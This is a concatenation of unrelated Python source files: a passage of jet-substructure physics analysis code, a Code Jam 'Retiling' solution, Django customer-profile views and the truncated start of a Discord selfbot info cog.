def fill_matching_histograms(self, jet_combined, jetR, R_max):
if jet_combined.has_user_info():
jet_truth = jet_combined.python_info().match
if jet_truth:
# Fill delta pt
delta_pt = (jet_combined.pt() - jet_truth.pt())
getattr(self, 'hDeltaPt_emb_R{}_Rmax{}'.format(jetR, R_max)).Fill(jet_truth.pt(), delta_pt)
# Fill subjet histograms
if 'subjet_z' in self.observable_list:
for subjetR in self.obs_settings['subjet_z']:
self.fill_subjet_histograms(jet_combined, jet_truth, jetR, subjetR, R_max)
#---------------------------------------------------------------
# Fill subjet histograms
#---------------------------------------------------------------
def fill_subjet_histograms(self, jet_combined, jet_truth, jetR, subjetR, R_max):
# Find subjets
cs_subjet_combined = fj.ClusterSequence(jet_combined.constituents(), self.subjet_def[subjetR])
subjets_combined = fj.sorted_by_pt(cs_subjet_combined.inclusive_jets())
cs_subjet_truth = fj.ClusterSequence(jet_truth.constituents(), self.subjet_def[subjetR])
subjets_truth = fj.sorted_by_pt(cs_subjet_truth.inclusive_jets())
# Find leading subjets and fill matched pt
leading_subjet_combined = self.leading_subjet(subjets_combined)
leading_subjet_truth = self.leading_subjet(subjets_truth)
z_leading_combined = leading_subjet_combined.pt() / jet_combined.pt()
matched_pt = fjtools.matched_pt(leading_subjet_combined, leading_subjet_truth)
name = 'h_subjet_z_fraction_leading_JetPt_R{}_{}_Rmax{}'.format(jetR, subjetR, R_max)
getattr(self, name).Fill(jet_truth.pt(), z_leading_combined, matched_pt)
# Set subjet matches
# Beware that defining geometrical subjet matches highly constrains them to match by pt
# Loop through subjets and set jet matching candidates (based on deltaR) for each jet in user_info
[[self.set_matching_candidates(subjet_combined, subjet_truth, subjetR,
'hDeltaR_subjet_z_R{}_{{}}_Rmax{}'.format(jetR, R_max)) for subjet_truth in subjets_truth]
for subjet_combined in subjets_combined]
# Loop through subjets and set accepted matches
hname = 'hJetMatchingQA_R{}_Rmax{}'.format(jetR, R_max)
[self.set_matches_AA_truth(subjet_combined, subjetR, hname) for subjet_combined in subjets_combined]
# Loop through matches and fill histograms
for subjet_combined in subjets_combined:
if subjet_combined.has_user_info():
subjet_truth = subjet_combined.python_info().match
if subjet_truth:
z_truth = subjet_truth.pt() / jet_truth.pt()
# Compute fraction of pt of truth subjet contained in matched combined subjet
matched_pt = fjtools.matched_pt(subjet_combined, subjet_truth)
name = 'h_subjet_z_fraction_JetPt_R{}_{}_Rmax{}'.format(jetR, subjetR, R_max)
getattr(self, name).Fill(jet_truth.pt(), z_truth, matched_pt)
#---------------------------------------------------------------
# Loop through jets and fill response if both det and truth jets are unique match
#---------------------------------------------------------------
def leading_subjet(self, subjets):
leading_subjet = None
for subjet in subjets:
if not leading_subjet:
leading_subjet = subjet
if subjet.pt() > leading_subjet.pt():
leading_subjet = subjet
return leading_subjet
#---------------------------------------------------------------
# Loop through jets and fill response if both det and truth jets are unique match
#---------------------------------------------------------------
def fill_groomed_jet_matches(self, grooming_setting, jet_combined, i_jet, jetR, R_max):
grooming_label = self.utils.grooming_label(grooming_setting)
if jet_combined.has_user_info():
jet_truth = jet_combined.python_info().match
if jet_truth:
jet_pt_combined_ungroomed = jet_combined.pt()
jet_pt_truth_ungroomed = jet_truth.pt()
if self.debug_level > 2:
print('**** jet_pt_combined_ungroomed: {}, jet_pt_truth_ungroomed: {}'.format(jet_pt_combined_ungroomed, jet_pt_truth_ungroomed))
# Groom combined jet
gshop_combined = fjcontrib.GroomerShop(jet_combined, jetR, self.reclustering_algorithm)
jet_combined_groomed_lund = self.utils.groom(gshop_combined, grooming_setting, jetR)
if not jet_combined_groomed_lund:
return
# Groom truth jet
gshop_truth = fjcontrib.GroomerShop(jet_truth, jetR, self.reclustering_algorithm)
jet_truth_groomed_lund = self.utils.groom(gshop_truth, grooming_setting, jetR)
if not jet_truth_groomed_lund:
return
# Fill some variables
theta_g_combined = jet_combined_groomed_lund.Delta()/jetR
theta_g_truth = jet_truth_groomed_lund.Delta()/jetR
zg_combined = jet_combined_groomed_lund.z()
zg_truth = jet_truth_groomed_lund.z()
if 'kappa' in self.observable_list:
kappa_combined = self.kappa(zg_combined, theta_g_combined)
kappa_truth = self.kappa(zg_truth, theta_g_truth)
if 'tf' in self.observable_list:
tf_combined = self.tf(zg_combined, theta_g_combined)
tf_truth = self.tf(zg_truth, theta_g_truth)
# Fill prong matching histograms
if grooming_setting in self.obs_grooming_settings['theta_g']:
prong_match = self.fill_prong_matching_histograms(jet_truth, jet_truth_groomed_lund, jet_combined, jet_combined_groomed_lund, jet_pt_truth_ungroomed, jetR, grooming_setting, grooming_label, R_max)
# Plot diagram
if self.plot_diagram:
self.diagram(jet_truth, jet_combined, prong_match, i_jet, grooming_setting, jetR)
# Fill combined histograms
hname = 'h_theta_g_zg_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
x = ([jet_pt_truth_ungroomed, zg_combined, theta_g_combined, prong_match])
x_array = array('d', x)
getattr(self, hname).Fill(x_array)
if 'kappa' in self.observable_list:
hname = 'h_kappa_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, kappa_combined, prong_match)
if 'tf' in self.observable_list:
hname = 'h_tf_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, tf_combined, prong_match)
# Fill truth histograms
if self.fill_Rmax_indep_hists:
hname = 'h_theta_g_zg_JetPt_Truth_R{}_{}'.format(jetR, grooming_label)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, zg_truth, theta_g_truth)
if 'kappa' in self.observable_list:
hname = 'h_kappa_JetPt_Truth_R{}_{}'.format(jetR, grooming_label)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, kappa_truth)
if 'tf' in self.observable_list:
hname = 'h_tf_JetPt_Truth_R{}_{}'.format(jetR, grooming_label)
getattr(self, hname).Fill(jet_pt_truth_ungroomed, tf_truth)
# Fill tree
if self.fill_tree:
if R_max == self.main_R_max:
if grooming_setting == self.grooming_settings[0]:
self.tw.fill_branch('R{}_jet_pt_truth_ungroomed'.format(jetR), jet_pt_truth_ungroomed)
self.tw.fill_branch('R{}_jet_pt_combined_ungroomed'.format(jetR), jet_pt_combined_ungroomed)
label = 'R{}_Rmax{}_{}'.format(jetR, R_max, grooming_label)
jet_combined_groomed = jet_combined_groomed_lund.pair()
jet_pt_combined_groomed = jet_combined_groomed.pt()
self.tw.fill_branch('{}_jet_pt_combined_groomed'.format(label), jet_pt_combined_groomed)
self.tw.fill_branch('{}_zg_combined'.format(label), zg_combined)
self.tw.fill_branch('{}_theta_g_combined'.format(label), theta_g_combined)
self.tw.fill_branch('{}_prong_matching_flag'.format(label), prong_match)
#---------------------------------------------------------------
# Plot diagram
#---------------------------------------------------------------
def diagram(self, jet_truth, jet_combined, prong_match, i_jet, grooming_setting, jetR):
if jet_truth.pt() < 40 or jet_truth.pt() > 100:
return
# Groom truth jet, and get list of all Lund splits
gshop_truth = fjcontrib.GroomerShop(jet_truth, jetR, self.reclustering_algorithm)
jet_truth_groomed_lund = self.utils.groom(gshop_truth, grooming_setting, jetR)
jet_truth_lunds = gshop_truth.lund_splits()
if not jet_truth_lunds:
return
# Loop through Lund splits, and draw diagram
self.single_diagram(jet_truth, jet_truth_lunds, jet_pt=jet_truth.pt(),
i_jet=i_jet, label='truth')
# Groom combined jet, and get list of all Lund splits
gshop_combined = fjcontrib.GroomerShop(jet_combined, jetR, self.reclustering_algorithm)
jet_combined_groomed_lund = self.utils.groom(gshop_combined, grooming_setting, jetR)
jet_combined_lunds = gshop_combined.lund_splits()
if not jet_combined_lunds:
return
# Loop through Lund splits, and draw diagram
self.single_diagram(jet_combined, jet_combined_lunds, jet_pt=jet_truth.pt(),
i_jet=i_jet, prong_match=prong_match, label='combined')
# 1: subleading
# 2: leading, swap (>10% of leading in subleading)
# 3: leading, mis-tag (<10% of leading in subleading)
# 4: ungroomed
# 5: outside
# 6: other (i.e. 50% is not in any of the above)
# 7: pp-truth passed grooming, but combined jet failed grooming
# 8: combined jet passed grooming, but pp-truth failed grooming
# 9: both pp-truth and combined jet failed SoftDrop
#---------------------------------------------------------------
# Plot diagram
#---------------------------------------------------------------
def single_diagram(self, jet, jet_lunds, jet_pt=0., i_jet=-1, prong_match='', label=''):
# Plot settings
linewidth=3.
color_pythia = sns.xkcd_rgb['denim blue']
color_thermal = sns.xkcd_rgb['pale red']
color_primary = sns.xkcd_rgb['grey']
ymin = 0.98
ymax = 1.08
# Loop through primary Lund plane
delta = 0.7/len(jet_lunds)
found_split = False
for i, split in enumerate(jet_lunds):
pt = split.pair().pt()
z = split.z()
dr = split.Delta()
# Draw softer splitting
length = pt*z / jet_pt
x = [delta*(i+1), delta*(i+1) + length*np.cos(dr)]
y = [1, 1 + length*np.sin(dr)]
plt.plot(x, y, color_pythia, linewidth=linewidth, label=('PYTHIA' if (i==0 and label != 'truth') else '_'))
# Draw fraction of splitting from background
prong = split.softer()
prong_pt = prong.pt()
matched_pt = 0.
for p in prong.constituents():
if p.user_index() >= 0:
matched_pt += p.pt()
length *= 1 - matched_pt/prong_pt
x = [delta*(i+1), delta*(i+1) + length*np.cos(dr)]
y = [1, 1 + length*np.sin(dr)]
if length > 1e-3:
plt.plot(x, y, color_thermal, linewidth=linewidth, label=('Background' if i==0 else '_'))
# Identify first splitting passing SD condition
if not found_split:
if z > 0.1:
found_split = True
x_split = [x[0], x[0]]
y_split = [y[0], y[0]]
# Draw leading branch
x = [0, 1]
y = [1, 1]
plt.plot(x, y, color_primary, linewidth=linewidth+1.2)
if found_split:
if prong_match in [1, 2, '']:
plt.plot(x_split, y_split, color_pythia, marker='o', markersize=12)
elif prong_match in [3,4,5,6]:
plt.plot(x_split, y_split, color_thermal, marker='o', markersize=12)
# Draw main legend
pt_label = r'$p_{{\mathrm{{T,jet}}}} = {:.0f} \;\mathrm{{GeV}}/c$'.format(jet_pt)
reclustering_label = '{} reclustering'.format(self.recluster_alg)
grooming_label = r'Soft Drop $z_{\mathrm{cut}}=0.1$'
if label == 'truth':
title = '{} \n{} \n{} \n{}'.format(r'$\bf{{pp}}$', grooming_label,
reclustering_label, pt_label)
else:
title = '{} \n{} \n{} \n{}'.format(r'$\bf{{pp + thermal}}$', grooming_label,
reclustering_label, pt_label)
first_legend = plt.legend(title = title, title_fontsize=15,
loc='upper right', fontsize=12)
ax = plt.gca().add_artist(first_legend)
axes = plt.gca()
axes.set_ylim([ymin, ymax])
plt.savefig(os.path.join(self.output_dir, 'diagram_ev{}_jet{}_{}{}.pdf'.format(self.event_number, i_jet, label, prong_match)))
plt.close('all')
#---------------------------------------------------------------
# Do prong-matching
#---------------------------------------------------------------
def fill_prong_matching_histograms(self, jet_truth, jet_truth_groomed_lund, jet_combined, jet_combined_groomed_lund, jet_pt_truth_ungroomed, jetR, grooming_setting, grooming_label, R_max):
# Dynamical grooming returns a fjcontrib::LundGenerator
# The prongs can be retrieved directly from this object.
# If the object exists, then it has passed grooming
jet_truth_prong1 = jet_truth_groomed_lund.harder()
jet_truth_prong2 = jet_truth_groomed_lund.softer()
# Get prongs of combined jet
jet_combined_prong1 = jet_combined_groomed_lund.harder()
jet_combined_prong2 = jet_combined_groomed_lund.softer()
# Get the fastjet::PseudoJets from the fjcontrib::LundGenerators
jet_truth_groomed = jet_truth_groomed_lund.pair()
jet_combined_groomed = jet_combined_groomed_lund.pair()
has_parents_truth = jet_truth_groomed.has_constituents()
has_parents_combined = jet_combined_groomed.has_constituents()
# Check that groomed truth jet doesn't contain any background tracks
problem = False
if has_parents_truth:
for constituent in jet_truth_groomed.constituents():
if constituent.user_index() < 0:
problem = True
if problem:
print(grooming_setting)
print(dir(jet_truth_groomed_lund))
print('pair: {}'.format(jet_truth_groomed_lund.pair()))
print('kappa: {}'.format(jet_truth_groomed_lund.kappa()))
print('groomed constituents: {}'.format([track.user_index() for track in jet_truth_groomed.constituents()]))
print('jet constituents: {}'.format([track.user_index() for track in jet_truth.constituents()]))
print('prong1 constituents: {}'.format([track.user_index() for track in jet_truth_prong1.constituents()]))
print('prong2 constituents: {}'.format([track.user_index() for track in jet_truth_prong2.constituents()]))
if self.debug_level > 1:
if jet_pt_truth_ungroomed > 80.:
print('=======================================================')
print(type)
print('jet_pt_truth_ungroomed: {}'.format(jet_pt_truth_ungroomed))
print('jet_pt_truth_groomed: {}'.format(jet_truth_groomed.pt()))
print('jet_pt_combined_groomed: {}'.format(jet_combined_groomed.pt()))
print('')
print('jet_truth tracks: {}'.format([track.user_index() for track in jet_truth.constituents()]))
print(' track pt: {}'.format([np.around(track.pt(),2) for track in jet_truth.constituents()]))
if jet_truth_groomed.has_constituents():
print('jet_truth_groomed tracks: {}'.format([track.user_index() for track in jet_truth_groomed.constituents()]))
print(' track pt: {}'.format([np.around(track.pt(),2) for track in jet_truth_groomed.constituents()]))
if jet_combined_groomed.has_constituents():
print('jet_combined groomed tracks: {}'.format([track.user_index() for track in jet_combined_groomed.constituents()]))
print(' track pt: {}'.format([np.around(track.pt(),2) for track in jet_combined_groomed.constituents()]))
if jet_combined.has_constituents():
print('jet_combined ungroomed tracks: {}'.format([track.user_index() for track in jet_combined.constituents()]))
print(' track pt: {}'.format([np.around(track.pt(),2) for track in jet_combined.constituents()]))
# Compute fraction of pt of the pp-truth prong tracks that is contained in the combined-jet prong,
# in order to have a measure of whether the combined-jet prong is the "same" prong as the pp-truth prong
deltaR_prong1 = -1.
deltaR_prong2 = -1.
deltaZ = -1.
rg_truth = -1.
zg_truth = -1.
if has_parents_truth and has_parents_combined:
# Subleading jet pt-matching
# --------------------------
# (1) Fraction of pt matched: subleading pp-det in subleading combined
matched_pt_subleading_subleading = fjtools.matched_pt(jet_combined_prong2, jet_truth_prong2)
# (2) Fraction of pt matched: subleading pp-det in leading combined
matched_pt_subleading_leading = fjtools.matched_pt(jet_combined_prong1, jet_truth_prong2)
# (3) Fraction of pt matched: subleading pp-det in ungroomed combined jet
matched_pt_subleading_groomed = fjtools.matched_pt(jet_combined_groomed, jet_truth_prong2)
matched_pt_subleading_ungroomed = fjtools.matched_pt(jet_combined, jet_truth_prong2)
matched_pt_subleading_ungroomed_notgroomed = matched_pt_subleading_ungroomed - matched_pt_subleading_groomed
# (4) Fraction of pt matched: subleading pp-det not in ungroomed combined jet
matched_pt_subleading_outside = 1 - matched_pt_subleading_ungroomed
# Leading jet pt-matching
# --------------------------
# (1) Fraction of pt matched: leading pp-det in subleading combined
matched_pt_leading_subleading = fjtools.matched_pt(jet_combined_prong2, jet_truth_prong1)
# (2) Fraction of pt matched: leading pp-det in leading combined
matched_pt_leading_leading = fjtools.matched_pt(jet_combined_prong1, jet_truth_prong1)
# (3) Fraction of pt matched: leading pp-det in ungroomed combined jet
matched_pt_leading_groomed = fjtools.matched_pt(jet_combined_groomed, jet_truth_prong1)
matched_pt_leading_ungroomed = fjtools.matched_pt(jet_combined, jet_truth_prong1)
matched_pt_leading_ungroomed_notgroomed = matched_pt_leading_ungroomed - matched_pt_leading_groomed
# (4) Fraction of pt matched: leading pp-det not in ungroomed combined jet
matched_pt_leading_outside = 1 - matched_pt_leading_ungroomed
# Compute delta-R between pp-det prong and combined prong
# --------------------------
deltaR_prong1 = jet_combined_prong1.delta_R(jet_truth_prong1)
deltaR_prong2 = jet_combined_prong2.delta_R(jet_truth_prong2)
deltaZ = jet_combined_groomed_lund.z() - jet_truth_groomed_lund.z()
rg_truth = jet_truth_groomed_lund.Delta()
zg_truth = jet_truth_groomed_lund.z()
if self.debug_level > 3:
if rg_truth < 0.:
print(rg_truth)
if self.debug_level > 1:
if jet_pt_truth_ungroomed > 80.:
print('subleading prong tracks -- combined: {}'.format([track.user_index() for track in jet_combined_prong2.constituents()]))
print('subleading prong tracks -- pp-truth: {}'.format([track.user_index() for track in jet_truth_prong2.constituents()]))
print('leading prong tracks -- combined: {}'.format([track.user_index() for track in jet_combined_prong1.constituents()]))
print('leading prong tracks -- pp-truth: {}'.format([track.user_index() for track in jet_truth_prong1.constituents()]))
print('')
print('leading_prong_pt: {}'.format(jet_combined_prong1.pt()))
print('matched_pt_leading_subleading fraction: {}'.format(matched_pt_leading_subleading))
print('matched_pt_leading_leading fraction: {}'.format(matched_pt_leading_leading))
print('matched_pt_leading_ungroomed_notgroomed fraction: {}'.format(matched_pt_leading_ungroomed_notgroomed))
print('matched_pt_leading_outside fraction: {}'.format(matched_pt_leading_outside))
print('')
print('subleading_prong_pt: {}'.format(jet_combined_prong2.pt()))
print('matched_pt_subleading_subleading fraction: {}'.format(matched_pt_subleading_subleading))
print('matched_pt_subleading_leading fraction: {}'.format(matched_pt_subleading_leading))
print('matched_pt_subleading_ungroomed_notgroomed fraction: {}'.format(matched_pt_subleading_ungroomed_notgroomed))
print('matched_pt_subleading_outside fraction: {}'.format(matched_pt_subleading_outside))
print('')
print('deltaR_prong1: {}'.format(deltaR_prong1))
print('deltaR_prong2: {}'.format(deltaR_prong2))
elif has_parents_truth: # pp-truth passed grooming, but combined jet failed grooming
matched_pt_leading_leading = matched_pt_leading_subleading = matched_pt_leading_ungroomed_notgroomed = matched_pt_leading_outside = matched_pt_subleading_leading = matched_pt_subleading_subleading = matched_pt_subleading_ungroomed_notgroomed = matched_pt_subleading_outside = -0.1
elif has_parents_combined: # combined jet passed grooming, but pp-det failed grooming
matched_pt_leading_leading = matched_pt_leading_subleading = matched_pt_leading_ungroomed_notgroomed = matched_pt_leading_outside = matched_pt_subleading_leading = matched_pt_subleading_subleading = matched_pt_subleading_ungroomed_notgroomed = matched_pt_subleading_outside = -0.2
else: # both pp-det and combined jet failed SoftDrop
matched_pt_leading_leading = matched_pt_leading_subleading = matched_pt_leading_ungroomed_notgroomed = matched_pt_leading_outside = matched_pt_subleading_leading = matched_pt_subleading_subleading = matched_pt_subleading_ungroomed_notgroomed = matched_pt_subleading_outside = -0.3
# Leading prong
getattr(self, 'hProngMatching_leading_leading_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_leading, deltaR_prong1/rg_truth)
getattr(self, 'hProngMatching_leading_subleading_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_subleading, deltaR_prong1/rg_truth)
getattr(self, 'hProngMatching_leading_ungroomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_ungroomed_notgroomed, deltaR_prong1/rg_truth)
getattr(self, 'hProngMatching_leading_outside_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_outside, deltaR_prong1/rg_truth)
getattr(self, 'hProngMatching_leading_leading_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_leading, deltaZ/zg_truth)
getattr(self, 'hProngMatching_leading_subleading_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_subleading, deltaZ/zg_truth)
getattr(self, 'hProngMatching_leading_ungroomed_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_ungroomed_notgroomed, deltaZ/zg_truth)
getattr(self, 'hProngMatching_leading_outside_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_leading_outside, deltaZ/zg_truth)
# Subleading prong
getattr(self, 'hProngMatching_subleading_leading_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_leading, deltaR_prong2/rg_truth)
getattr(self, 'hProngMatching_subleading_subleading_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_subleading, deltaR_prong2/rg_truth)
getattr(self, 'hProngMatching_subleading_ungroomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_ungroomed_notgroomed, deltaR_prong2/rg_truth)
getattr(self, 'hProngMatching_subleading_outside_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_outside, deltaR_prong2/rg_truth)
getattr(self, 'hProngMatching_subleading_leading_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_leading, deltaZ/zg_truth)
getattr(self, 'hProngMatching_subleading_subleading_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_subleading, deltaZ/zg_truth)
getattr(self, 'hProngMatching_subleading_ungroomed_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_ungroomed_notgroomed, deltaZ/zg_truth)
getattr(self, 'hProngMatching_subleading_outside_JetPtZ_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_subleading_outside, deltaZ/zg_truth)
# Plot correlation of matched pt fraction for leading-subleading and subleading-leading
getattr(self, 'hProngMatching_subleading-leading_correlation_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_truth.pt(), matched_pt_leading_subleading, matched_pt_subleading_leading)
# Plot fraction of groomed pp truth pt that is contained in groomed combined jet
if has_parents_truth and has_parents_combined:
matched_pt_truth_groomed = fjtools.matched_pt(jet_combined_groomed, jet_truth_groomed)
getattr(self, 'hProngMatching_truth_groomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_truth_groomed)
matched_pt_truth2_groomed = fjtools.matched_pt(jet_combined_groomed, jet_truth_prong2)
getattr(self, 'hProngMatching_truth2_groomed_JetPt_R{}_{}_Rmax{}'.format(jetR, grooming_label, R_max)).Fill(jet_pt_truth_ungroomed, matched_pt_truth2_groomed)
# Plot initial fraction of subleading truth prong pt in combined ungroomed prong
# To do...
# Return flag based on where >50% of subleading matched pt resides:
# 1: subleading
# 2: leading, swap (>10% of leading in subleading)
# 3: leading, mis-tag (<10% of leading in subleading)
# 4: ungroomed
# 5: outside
# 6: other (i.e. 50% is not in any of the above)
# 7: pp-truth passed grooming, but combined jet failed grooming
# 8: combined jet passed grooming, but pp-truth failed grooming
# 9: both pp-truth and combined jet failed SoftDrop
if matched_pt_subleading_subleading > self.prong_matching_threshold:
return 1
elif matched_pt_subleading_leading > self.prong_matching_threshold:
if matched_pt_leading_subleading > 0.1:
return 2
else:
return 3
elif matched_pt_subleading_ungroomed_notgroomed > self.prong_matching_threshold:
return 4
elif matched_pt_subleading_outside > self.prong_matching_threshold:
return 5
elif matched_pt_leading_leading >= 0.:
return 6
elif matched_pt_leading_leading == -0.1:
return 7
elif matched_pt_leading_leading == -0.2:
return 8
elif matched_pt_leading_leading == -0.3:
return 9
else:
print('Warning -- flag not specified!')
return -1
#---------------------------------------------------------------
# Compute kappa
#---------------------------------------------------------------
def kappa(self, z, theta):
return z*theta
#---------------------------------------------------------------
# Compute tf
#---------------------------------------------------------------
def tf(self, z, theta):
return z*theta*theta
##################################################################
if __name__ == '__main__':
# Define arguments
parser = argparse.ArgumentParser(description='Process MC')
parser.add_argument('-f', '--inputFile', action='store',
type=str, metavar='inputFile',
default='AnalysisResults.root',
help='Path of ROOT file containing TTrees')
parser.add_argument('-c', '--configFile', action='store',
type=str, metavar='configFile',
default='config/analysis_config.yaml',
help="Path of config file for analysis")
parser.add_argument('-o', '--outputDir', action='store',
type=str, metavar='outputDir',
default='./TestOutput',
help='Output directory for output to be written to')
# Parse the arguments
args = parser.parse_args()
print('Configuring...')
print('inputFile: \'{0}\''.format(args.inputFile))
print('configFile: \'{0}\''.format(args.configFile))
print('ouputDir: \'{0}\"'.format(args.outputDir))
# If invalid inputFile is given, exit
if not os.path.exists(args.inputFile):
print('File \"{0}\" does not exist! Exiting!'.format(args.inputFile))
sys.exit(0)
# If invalid configFile is given, exit
if not os.path.exists(args.configFile):
print('File \"{0}\" does not exist! Exiting!'.format(args.configFile))
sys.exit(0)
analysis = ProcessGroomers(input_file=args.inputFile, config_file=args.configFile, output_dir=args.outputDir)
analysis.process_groomers()
|
# Copyright (c) 2021 kamyu. All rights reserved.
#
# Google Code Jam 2021 Round 2 - Problem D. Retiling
# https://codingcompetitions.withgoogle.com/codejam/round/0000000000435915/00000000007dc2de
#
# Time: O((R * C)^3)
# Space: O((R * C)^2)
#
# Template translated from:
# https://github.com/kth-competitive-programming/kactl/blob/main/content/graph/WeightedMatching.h
# Time: O(N^2 * M)
# Space: O(N + M)
def hungarian(a):
if not a:
return 0, []
n, m = len(a)+1, len(a[0])+1
u, v, p, ans = [0]*n, [0]*m, [0]*m, [0]*(n-1)
for i in xrange(1, n):
p[0] = i
j0 = 0 # add "dummy" worker 0
dist, pre = [float("inf")]*m, [-1]*m
done = [False]*(m+1)
while True: # dijkstra
done[j0] = True
i0, j1, delta = p[j0], None, float("inf")
for j in xrange(1, m):
if done[j]:
continue
cur = a[i0-1][j-1]-u[i0]-v[j]
if cur < dist[j]:
dist[j], pre[j] = cur, j0
if dist[j] < delta:
delta, j1 = dist[j], j
for j in xrange(m):
if done[j]:
u[p[j]] += delta
v[j] -= delta
else:
dist[j] -= delta
j0 = j1
if not p[j0]:
break
while j0: # update alternating path
j1 = pre[j0]
p[j0], j0 = p[j1], j1
for j in xrange(1, m):
if p[j]:
ans[p[j]-1] = j-1
return -v[0], ans # min cost
def retiling():
R, C, F, S = map(int, raw_input().strip().split())
src, dst = [[raw_input().strip() for _ in xrange(R)] for _ in xrange(2)]
pos0 = [(i, j) for i in xrange(R) for j in xrange(C) if src[i][j] == 'M']
pos1 = [(i, j) for i in xrange(R) for j in xrange(C) if dst[i][j] == 'M']
cost = [[0]*(len(pos0)+len(pos1)) for _ in xrange(len(pos0)+len(pos1))]
for i in xrange(len(cost)):
for j in xrange(len(cost[0])):
if i < len(pos0) and j < len(pos1):
cost[i][j] = S * (abs(pos0[i][0]-pos1[j][0])+abs(pos0[i][1]-pos1[j][1]))
elif i < len(pos0) or j < len(pos1):
cost[i][j] = F
return hungarian(cost)[0]
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, retiling())
|
from django.shortcuts import render
from django.http import HttpResponse
from website import forms
from website.models import Customer, Order, Product
from django.contrib.auth.models import User
def index(request):
context = dict()
if ("userID" in request.session) and (request.session["userID"] != "anon"):
userID = request.session["userID"]
categories = Product.objects.values("product_category").distinct()
customer = Customer.objects.values(
"customer_username",
"customer_first",
"customer_last",
"customer_email",
"customer_address",
"customer_telephone"
).filter(
customer_id__exact=userID
)
order = Order.objects.values(
"order_id",
"order_product_id_quantity_json",
"order_date",
"order_shipped",
"order_delivered",
"order_charged",
"order_payed",
"order_last_4_credit"
).filter(
order_customer_id__exact=userID
)
context["customer"] = customer
context["orders"] = order
context["categories"] = categories
return render(request, 'user/user.html', context)
def updateUser(request):
try:
username = request.POST['username']
email = request.POST['email']
firstName = request.POST['first']
lastName = request.POST['last']
address = request.POST['address']
telephone = request.POST['telephone']
f = forms.updateUserInfoForm({'username': username, 'email': email, 'firstName': firstName, 'lastName': lastName, 'address': address, 'telephone': telephone})
if f.is_valid():
# update user
user = User.objects.get(pk=request.session['userID'])
user.username = username
user.email = email
user.save()
# update customer
customer = Customer.objects.get(pk=request.session['userID'])
customer.customer_username = username
customer.customer_first = firstName
customer.customer_last = lastName
customer.customer_email = email
customer.customer_address = address
customer.customer_telephone = telephone
customer.save()
return HttpResponse("saved!")
except Exception as e:
return HttpResponse(e)
|
#
# cogs/info/core.py
#
# mawabot - Maware's selfbot
# Copyright (c) 2017 Ma-wa-re, Ammon Smith
#
# mawabot is available free of charge under the terms of the MIT
# License. You are free to redistribute and/or modify it under those
# terms. It is distributed in the hopes that it will be useful, but
# WITHOUT ANY WARRANTY. See the LICENSE file for more details.
#
''' Has several commands that get miscellaneous pieces of information '''
from datetime import datetime
import bisect
import time
import astral
import discord
from discord.ext import commands
__all__ = [
'General',
]
class General:
__slots__ = (
'bot',
'astral',
'zodiac',
'moon_phases',
)
def __init__(self, bot):
self.bot = bot
self.astral = astral.Astral()
self.zodiac = (
(120, '\N{CAPRICORN}'),
(218, '\N{AQUARIUS}'),
(320, '\N{PISCES}'),
(420, '\N{ARIES}'),
(521, '\N{TAURUS}'),
(621, '\N{GEMINI}'),
(722, '\N{CANCER}'),
(823, '\N{LEO}'),
(923, '\N{VIRGO}'),
(1023, '\N{LIBRA}'),
(1122, '\N{SCORPIUS}'),
(1222, '\N{SAGITTARIUS}'),
(1231, '\N{CAPRICORN}'),
)
self.moon_phases = (
(0, '\N{NEW MOON SYMBOL}'),
(4, '\N{WAXING CRESCENT MOON SYMBOL}'),
(7, '\N{FIRST QUARTER MOON SYMBOL}'),
(11, '\N{WAXING GIBBOUS MOON SYMBOL}'),
(14, '\N{FULL MOON SYMBOL}'),
(18, '\N{WANING GIBBOUS MOON SYMBOL}'),
(21, '\N{LAST QUARTER MOON SYMBOL}'),
(26, '\N{WANING CRESCENT MOON SYMBOL}'),
)
def get_zodiac(self, month, day):
date = 100 * month + day
index = bisect.bisect(self.zodiac, (date, ''))
return self.zodiac[index][1]
def get_moon_phase(self, date):
phase = self.astral.moon_phase(date)
